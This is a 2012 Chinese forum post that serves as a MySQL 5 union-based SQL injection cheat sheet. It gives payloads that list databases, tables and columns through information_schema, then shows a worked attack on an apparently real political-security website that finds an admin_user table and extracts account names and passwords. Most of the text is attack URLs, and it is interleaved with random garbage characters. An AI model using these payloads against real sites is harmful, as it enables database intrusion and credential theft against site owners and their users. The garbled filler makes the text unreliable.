查库' v/ S( |) ]& d
: }4 O3 \+ d, g! x# d! g3 ?) r5 y F
id=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/*
! |! c0 s3 F2 {3 p# q; H
0 H0 l! I+ e( F查表
/ C$ p Y+ M; z2 ~" ?+ A1 f
# q7 K8 E7 p( J0 ?id=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=库的HEX值/**/limit/**/1,1
" H1 c7 ^! J1 t6 q
: n d. \; ^! F2 \7 M& l查段
) a- \7 F4 @- P2 [! o& B& x4 ]' A) S( v' o- P& o- _
id=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=表的HEX值/**/limit/**/1,11 I( B: \+ t/ M6 P( D
) M, ?5 k+ t" S& G/ z8 m1 F2 U2 x( C; z0 o! ]( I7 h
mysql5高级注入方法暴表
! m# d( b$ T" k7 d& B! E7 Z' z- j) I: R! |/ H1 C
例子如下:/ U y# U9 b( k: ^: L9 M F
( l9 P5 S+ H$ W: l
1.爆表/ } a' |) T4 i% ~# ]; k! T
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574为数据库名的16进制转换yd_teamnet)
" c: Y. D! G- C5 r9 T+ H; l3 e这样爆到第4个时出现了admin_user表。9 Z! y+ K; k5 A8 g. N0 t( O
- }. F$ p4 a- v0 q& n; A) _2.暴字段. k1 n: c L! h; c
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*
5 \! f% L; E5 m* }. w& T) v+ @0 v* g+ L* s
: ^& g2 M2 b6 G3 q: I$ U6 D
3.爆密码3 G8 r9 k6 Q# z: Z) f
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/*
- h2 e6 {8 C, ^0 E
G- L$ [. I1 F+ Z) Y
3 S: s8 J) d6 s |
发表于 2012-9-13 16:29:37
收藏
支持
反对